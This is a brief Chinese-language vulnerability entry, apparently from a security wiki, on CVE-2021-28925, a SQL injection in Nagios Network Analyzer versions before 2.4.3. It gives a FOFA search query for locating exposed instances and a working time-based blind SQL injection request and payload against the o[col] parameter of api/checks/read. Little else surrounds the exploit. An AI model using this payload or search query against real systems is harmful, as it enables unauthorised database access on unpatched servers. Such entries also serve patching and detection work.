Nagios Network Analyzer SQL 注入漏洞(CVE-2021-28925)

Nagios Network Analyzer 2.4.3 之前的版本中存在 SQL 注入漏洞。参数为 o[col] 接口为 api/checks/read/.

FOFA:title="Nagios Network Analyzer"

影响版本:Nagios Network Analyzer < 2.4.3

PoC:

GET /api/checks/read?o[col]=+AND+(SELECT+777+FROM+(SELECT(SLEEP(15)))LURIEL_STOLABS) HTTP/1.1
HOST:target
....
Payload:+AND+(SELECT+777+FROM+(SELECT(SLEEP(15)))LURIEL_STOLABS)

ref:

Edge Security文库 all right reserved,powered by GitbookFile Modify: 2021-05-22 00:14:38

results matching ""

    No results matching ""